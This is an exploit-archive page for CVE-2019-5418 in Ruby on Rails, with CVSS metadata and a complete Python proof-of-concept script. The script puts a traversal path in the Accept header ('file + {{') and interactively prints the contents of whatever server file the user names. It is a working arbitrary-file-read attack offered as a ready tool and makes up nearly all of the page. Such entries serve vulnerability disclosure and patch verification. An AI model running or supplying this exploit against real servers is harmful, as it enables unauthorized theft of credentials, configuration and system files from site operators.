Rails 5.2.1 Arbitrary File Content Disclosure

2019.03.22
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

''' Exploit Title: File Content Disclosure on Rails Date: CVE disclosed 3/16 today's date is 3/20 Exploit Author: NotoriousRebel Vendor Homepage: https://rubyonrails.org/ Software Link: https://github.com/rails/rails Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows) CVE: 2019-5418 ''' import sys try: import requests except ImportError: print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m') sys.exit(1) def banner(): banner = """ ---------------------------------------------- Arbitrary Traversal exploit for Ruby on Rails CVE-2019-5418 ---------------------------------------------- """ print(banner) def check_args(): if len(sys.argv) != 2: print("Invalid number of arguments entered!") how_to_use = "python3 Bandit.py url" print('Use as:', how_to_use) sys.exit(1) def check_url(url): status_code = requests.get(url) if status_code != 200: print("Url is invalid or can not be reached!") sys.exit(1) def read_file(url, file): headers = {'Accept': file + '{{'} req = requests.get(url, headers=headers) return req def main(): banner() check_args() url = sys.argv[1] while True: try: file = input("Enter file to read (enter quit to exit): ") except Exception: file = raw_input("Enter file to read (enter quit to exit): ") try: if file.lower() == 'quit': break except Exception: if file == 'quit': break response = read_file(url, file) print(response.text) if __name__ == '__main__': try: main() except KeyboardInterrupt: print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top